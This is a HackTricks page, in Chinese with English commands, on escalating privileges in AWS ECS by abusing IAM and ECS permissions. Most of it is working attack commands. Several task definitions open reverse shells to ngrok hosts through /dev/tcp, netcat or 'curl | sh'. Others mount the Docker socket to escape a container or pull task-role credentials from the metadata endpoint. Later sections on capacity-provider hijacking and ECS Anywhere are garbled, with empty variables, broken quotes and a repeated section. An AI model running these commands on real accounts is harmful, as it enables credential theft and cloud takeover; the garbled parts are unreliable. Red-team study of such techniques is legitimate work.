AWS - ECS Privesc

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

ECS

更多 关于 ECS 的信息

AWS - ECS Enum

iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask

攻击者滥用 iam:PassRoleecs:RegisterTaskDefinitionecs:RunTask 权限时,可在 ECS 中生成一个新的 task definition,包含窃取元数据凭证的恶意容器,并运行它。

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

潜在影响: 直接 privesc 到不同的 ECS role。

iam:PassRole,ecs:RunTask

拥有 iam:PassRoleecs:RunTask 权限的攻击者可以启动一个新的 ECS task,并修改 execution roletask role 和容器的 command 值。ecs run-task CLI 命令包含 --overrides 标志,可在运行时更改 executionRoleArntaskRoleArn 和容器的 command,而无需触及 task definition。

taskRoleArnexecutionRoleArn 指定的 IAM role 在其 trust policy 中必须信任/允许由 ecs-tasks.amazonaws.com 来 assume。

另外,攻击者还需要知道:

  • ECS cluster name
  • VPC Subnet
  • Security group(如果未指定 security group,则会使用默认的)
  • Task Definition Name and revision
  • Name of the Container
aws ecs run-task \
--cluster <cluster-name> \
--launch-type FARGATE \
--network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
--task-definition <task-definition:revision> \
--overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": <container-name>,
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

在上面的代码片段中,攻击者只覆盖了 taskRoleArn 的值。不过,为了使攻击得以发生,攻击者必须对命令中指定的 taskRoleArn 和任务定义中指定的 executionRoleArn 拥有 iam:PassRole 权限。

如果攻击者可以传递的 IAM 角色具有足够的权限来拉取到 ECR 镜像并启动 ECS 任务(ecr:BatchCheckLayerAvailabilityecr:GetDownloadUrlForLayerecr:BatchGetImageecr:GetAuthorizationToken),那么攻击者可以在 ecs run-task 命令中将相同的 IAM 角色同时指定为 executionRoleArntaskRoleArn

aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"executionRoleArn":"arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": "<container-name>",
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

潜在影响: 可直接对任何 ECS 任务角色 实现 privesc。

iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask

就像在之前的例子中,攻击者滥用 iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask 在 ECS 中的权限,可以 生成一个新的任务定义,并包含一个 恶意容器,该容器窃取元数据凭证并 运行它
但是,在这种情况下,需要有一个可用的容器实例来运行该恶意任务定义。

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

潜在影响: 直接对任意 ECS 角色进行 privesc。

iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)

与前面的示例类似,攻击者滥用 ECS 中的 iam:PassRoleecs:RegisterTaskDefinitionecs:UpdateServiceecs:CreateService 权限,能够 生成新的任务定义(task definition),在其中放入窃取元数据凭证(metadata credentials)的恶意容器,并通过创建至少有 1 个任务在运行的新服务(service)来运行它

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Potential Impact: 直接获得对任意 ECS role 的 privesc。

iam:PassRole, (ecs:UpdateService|ecs:CreateService)

实际上,仅凭这些权限就可以使用 overrides 在容器中以任意 role 执行任意命令,例如:

aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"

Potential Impact: 直接 privesc 到任何 ECS role。

ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

这种情况与之前类似,但 没有 iam:PassRole 权限。
这仍然很重要,因为如果你能运行任意容器,即使它没有 role,你也可以 运行一个特权容器以逃逸 到节点并 窃取 EC2 IAM role 以及 在该节点上运行的其他 ECS 容器的 role
你甚至可以 强制其他任务在你攻破的 EC2 实例内运行 以窃取它们的凭证(如 Privesc to node section 所述)。

Warning

此攻击仅在 ECS 集群正在使用 EC2 而非 Fargate 时才可行。

printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json

printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json


aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json


aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell

ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

拥有 ecs:ExecuteCommandecs:DescribeTasks 的攻击者可以在正在运行的容器内执行命令并外泄附加在该容器上的 IAM 角色(你需要 describe 权限,因为运行 aws ecs execute-command 时需要它)。
但是,为了实现这一点,容器实例需要运行 ExecuteCommand agent(默认情况下没有运行)。

因此,攻击者可以尝试:

  • 尝试在每个运行中的容器中运行命令
# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo "  Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"
  • 如果拥有 ecs:RunTask 权限,使用 aws ecs run-task --enable-execute-command [...] 运行任务
  • 如果拥有 ecs:StartTask 权限,使用 aws ecs start-task --enable-execute-command [...] 运行任务
  • 如果拥有 ecs:CreateService 权限,使用 aws ecs create-service --enable-execute-command [...] 创建服务
  • 如果拥有 ecs:UpdateService 权限,使用 aws ecs update-service --enable-execute-command [...] 更新服务

你可以在 先前的 ECS privesc 部分 中找到这些选项的示例。

Potential Impact: Privesc 到附加在容器上的不同角色。

ssm:StartSession

请查看 ssm privesc page,了解如何滥用此权限以 privesc to ECS

AWS - SSM Privesc

iam:PassRole, ec2:RunInstances

请查看 ec2 privesc page,了解如何滥用这些权限以 privesc to ECS

AWS - EC2 Privesc

ecs:RegisterContainerInstance, ecs:DeregisterContainerInstance, ecs:StartTask, iam:PassRole

具有这些权限的攻击者可能会在 ECS 集群中注册一个 EC2 实例并在其上运行任务。这可能允许攻击者在 ECS 任务的上下文中执行任意代码。

  • TODO: 是否有可能从不同的 AWS 账户注册实例,从而让任务在由攻击者控制的机器上运行??

ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets

Note

TODO: 测试此项

拥有 ecs:CreateTaskSetecs:UpdateServicePrimaryTaskSetecs:DescribeTaskSets 权限的攻击者可以为现有的 ECS 服务创建恶意任务集并更新主任务集。这使得攻击者能够在该服务内执行任意代码

# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

潜在影响:在受影响的服务中执行任意代码,可能影响其功能或窃取敏感数据。

参考资料

Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)

具有管理 ECS capacity providers 和更新服务权限的攻击者可以创建一个由自己控制的 EC2 Auto Scaling Group,将其封装为 ECS Capacity Provider,关联到目标 cluster,并将受害者服务迁移到该 provider。任务随后会被调度到攻击者控制的 EC2 实例上,从而获得操作系统级别的访问以检查容器并窃取 task role 凭证。

Commands (us-east-1):

  • 前置条件

  • 为 ECS agent 创建 Launch Template 以加入目标 cluster

  • 创建 Auto Scaling Group

  • 从 ASG 创建 Capacity Provider

  • 将 Capacity Provider 关联到 cluster(可选设为默认)

  • 将服务迁移到你的 provider

  • 验证任务是否部署到攻击者实例上

  • 可选:从 EC2 节点,docker exec 进入目标容器并读取 http://169.254.170.2 来获取 task role 凭证。

  • 清理

潜在影响: 攻击者控制的 EC2 节点会接收受害者任务,从而获得对容器的操作系统级别访问并窃取 task IAM role 凭证。

逐步命令(复制/粘贴) 
export AWS_DEFAULT_REGION=us-east-1
CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster
# Instance profile for ECS nodes
aws iam create-role --role-name ht-ecs-instance-role --assume-role-policy-document Version:2012-10-17 || true
aws iam attach-role-policy --role-name ht-ecs-instance-role --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role || true
aws iam create-instance-profile --instance-profile-name ht-ecs-instance-profile || true
aws iam add-role-to-instance-profile --instance-profile-name ht-ecs-instance-profile --role-name ht-ecs-instance-role || true

VPC=vpc-18e6ac62
SUBNETS=


AMI=ami-0b570770164588ab4
USERDATA=IyEvYmluL2Jhc2gKZWNobyBFQ1NfQ0xVU1RFUj0gPj4gL2V0Yy9lY3MvZWNzLmNvbmZpZwo=
LT_ID=


ASG_ARN=


CP_NAME=htcp-8797
aws ecs create-capacity-provider –name  –auto-scaling-group-provider “autoScalingGroupArn=,managedScaling={status=ENABLED,targetCapacity=100},managedTerminationProtection=DISABLED”
aws ecs put-cluster-capacity-providers –cluster “” –capacity-providers  –default-capacity-provider-strategy capacityProvider=,weight=1


SVC=


Task definition must be EC2-compatible (not Fargate-only)


aws ecs update-service –cluster “” –service “” –capacity-provider-strategy capacityProvider=,weight=1 –force-new-deployment


TASK=
CI=
aws ecs describe-container-instances –cluster “” –container-instances “” –query containerInstances[0].ec2InstanceId –output text




Backdoor compute in-cluster via ECS Anywhere EXTERNAL registration


滥用 ECS Anywhere 在受害者 ECS cluster 中将攻击者控制的主机注册为 EXTERNAL container instance,并在该主机上使用具有特权的 task 和 execution roles 运行任务。这授予对任务运行位置的操作系统级别控制(你的机器),并允许从任务和附加卷中窃取凭证/数据,而无需触碰 capacity providers 或 ASGs。


    

  • 

    所需权限(示例最小集合):
    

    • 

  • 

    ecs:CreateCluster (optional), ecs:RegisterTaskDefinition, ecs:StartTask or ecs:RunTask
    

    • 

  • 

    ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation
    

    • 

  • 

    iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole(用于 ECS Anywhere 实例角色和 task/execution roles)
    

    • 

  • 

    logs:CreateLogGroup/Stream, logs:PutLogEvents(如果使用 awslogs)
    

    • 

  • 

    影响:在攻击者主机上以选定的 taskRoleArn 运行任意容器;从 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI 外泄 task-role 凭证;访问任务挂载的任何卷;比操纵 capacity providers/ASGs 更隐蔽。
    

    • 



步骤


    

  1. 创建/识别 cluster (us-east-1)
    2. 



aws ecs create-cluster --cluster-name ht-ecs-anywhere



    

  1. 创建 ECS Anywhere 角色并进行 SSM 激活(针对 on-prem/EXTERNAL instance)
    2. 



aws iam create-role --role-name ecsAnywhereRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ssm.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role
ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
ACT_ID=$(echo $ACTJSON | jq -r .ActivationId); ACT_CODE=$(echo $ACTJSON | jq -r .ActivationCode)



    

  1. 部署 attacker 主机并将其自动注册为 EXTERNAL(例如:小型 AL2 EC2 作为 “on‑prem”)
    2. 




user-data.sh
```bash
#!/bin/bash
set -euxo pipefail
amazon-linux-extras enable docker || true
yum install -y docker curl jq
systemctl enable --now docker
curl -fsSL -o /root/ecs-anywhere-install.sh "https://amazon-ecs-agent.s3.amazonaws.com/ecs-anywhere-install-latest.sh"
chmod +x /root/ecs-anywhere-install.sh
/root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id ${ACT_ID} --activation-code ${ACT_CODE} --region us-east-1
```


```bash
AMI=$(aws ssm get-parameters --names /aws/service/ami-amazon-linux-latest/amzn2-ami-hvm-x86_64-gp2 --query 'Parameters[0].Value' --output text)
IID=$(aws ec2 run-instances --image-id $AMI --instance-type t3.micro \
--user-data file://user-data.sh --query 'Instances[0].InstanceId' --output text)
aws ec2 wait instance-status-ok --instance-ids $IID
```
4) 验证 EXTERNAL 容器实例已加入
```bash
aws ecs list-container-instances --cluster ht-ecs-anywhere
aws ecs describe-container-instances --cluster ht-ecs-anywhere \
--container-instances  --query 'containerInstances[0].[ec2InstanceId,attributes]'
# ec2InstanceId will be mi-XXXXXXXX (SSM managed instance id) and attributes include ecs.capability.external
```
5) 创建 task/execution roles、注册 EXTERNAL task definition,并在 attacker host 上运行它
```bash
# roles
aws iam create-role --role-name ht-ecs-task-exec \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ht-ecs-task-exec --policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSTaskExecutionRolePolicy
aws iam create-role --role-name ht-ecs-task-role \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
# attach any privileges you want to abuse to this task role

task def (EXTERNAL launch)


cat > td-external.json << ‘JSON’
{
“family”: “ht-external”,
“requiresCompatibilities”: [ “EXTERNAL” ],
“networkMode”: “bridge”,
“memory”: “256”,
“cpu”: “128”,
“executionRoleArn”: “arn:aws:iam:::role/ht-ecs-task-exec”,
“taskRoleArn”: “arn:aws:iam:::role/ht-ecs-task-role”,
“containerDefinitions”: [
{“name”:“steal”,“image”:“public.ecr.aws/amazonlinux/amazonlinux:latest”,
“entryPoint”:[“/bin/sh”,“-c”],
“command”:[“REL=$(printenv AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); echo CREDS:; curl -s http://169.254.170.2$REL; sleep 600”],
“memory”: 128,
“logConfiguration”:{“logDriver”:“awslogs”,“options”:{“awslogs-region”:“us-east-1”,“awslogs-group”:“/ht/ecs/anywhere”,“awslogs-stream-prefix”:“steal”}}
}
]
}
JSON
aws logs create-log-group –log-group-name /ht/ecs/anywhere || true
aws ecs register-task-definition –cli-input-json file://td-external.json
CI=$(aws ecs list-container-instances –cluster ht-ecs-anywhere –query ‘containerInstanceArns[0]’ –output text)
aws ecs start-task –cluster ht-ecs-anywhere –task-definition ht-external 
–container-instances $CI


6) 从这里你可以控制运行任务的主机。你可以读取任务日志(如果使用 awslogs),或者直接在主机上 exec 来外传任务的凭证/数据。



#### Command example (placeholders)




### Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)

拥有管理 ECS capacity providers 和更新 services 权限的攻击者可以创建一个由其控制的 EC2 Auto Scaling Group,将其封装为一个 ECS Capacity Provider,关联到目标 cluster,并将受害者的 service 迁移为使用该 provider。随后,Tasks 会被调度到攻击者控制的 EC2 实例上,攻击者因此可获得 OS 级别访问,对容器进行检查并窃取 task role credentials。

Commands (us-east-1):

- Prereqs



- Create Launch Template for ECS agent to join target cluster



- Create Auto Scaling Group



- Create Capacity Provider from the ASG



- Associate the Capacity Provider to the cluster (optionally as default)



- Migrate a service to your provider



- Verify tasks land on attacker instances



- Optional: From the EC2 node, docker exec into target containers and read http://169.254.170.2 to obtain the task role credentials.

- Cleanup



**Potential Impact:** 攻击者控制的 EC2 节点会接收受害者的 tasks,从而获得 OS 级别访问容器并窃取 task IAM role credentials。
> [!TIP]
> 学习和实践 AWS 黑客技术:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> 学习和实践 GCP 黑客技术:<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> 学习和实践 Azure 黑客技术:<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>支持 HackTricks</summary>
>
> - 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
> - **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
>
> </details>